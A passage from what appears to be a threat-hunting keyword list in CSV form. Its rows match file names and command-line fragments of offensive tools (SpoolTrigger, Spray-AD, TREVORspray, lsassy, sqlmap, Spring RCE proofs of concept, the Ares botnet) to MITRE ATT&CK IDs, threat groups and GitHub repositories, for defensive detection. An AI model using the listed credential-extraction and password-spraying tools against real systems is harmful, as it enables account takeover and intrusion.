Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x64.dl*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x64.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x86.dl*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x86.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger\SpoolTrigger.*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spray* --recon *.* -u *.txt --threads 10*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with 
threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*Spray365.git*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*spray365.py*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*spray365_results_*.json*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*Spray-AD *,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,0,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.cna*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.dll*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.exe*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.sln*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD\Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,0,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*sprayhound -*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*sprayhound -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sprayhound-master.zip*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*SprayingToolkit.git*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SprayingToolkit-master*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SprayingToolkit-master.zip*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*spraykatz*,offensive_tool_keyword,spraykatz,Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.,T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008,TA0003 - TA0004 - TA0007,N/A,N/A,Credential Access,https://github.com/aas-n/spraykatz,1,1,N/A,N/A,8,737,126,2020-06-20T12:14:00Z,2019-09-09T14:38:28Z -*spring_framework_malicious_jar*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Spring-cloud-function-SpEL-RCE*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,,N/A,,, -*spring-core-rce*ROOT.war*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*springFramework_CVE-2022-22965_RCE.py*,offensive_tool_keyword,POC,SpringFramework CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE,1,0,N/A,N/A,1,76,17,2022-04-01T12:08:45Z,2022-04-01T04:51:44Z -*spyonweb-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*sql_persister.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*SqlClrPayload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sqldumper.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*sqli_common_shared.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Sqli-lab*,offensive_tool_keyword,sqli-labs,SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:,T1190 - T1553,TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/Audi-1/sqli-labs,1,1,N/A,N/A,10,4688,1476,2020-06-04T19:51:55Z,2012-05-19T19:41:26Z -*SQL-Injection-Auth-Bypass-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*SQL-Injection-Libraries*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SQL-Injection-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*SQLiPy.py*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*SQLiScanner*,offensive_tool_keyword,SQLiScanner,Automatic SQL injection with Charles and sqlmapapi,T1190 - T1556 - T1210 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Web Attacks,https://github.com/0xbug/SQLiScanner,1,1,N/A,N/A,8,760,298,2018-05-01T09:59:47Z,2016-08-28T06:06:32Z -*sqlite:///ares.db*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*sqlmap -*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap --forms --batch -u 
*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sqlmap.conf*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sqlmap/data/txt/wordlist.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sqlmap4burp*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation 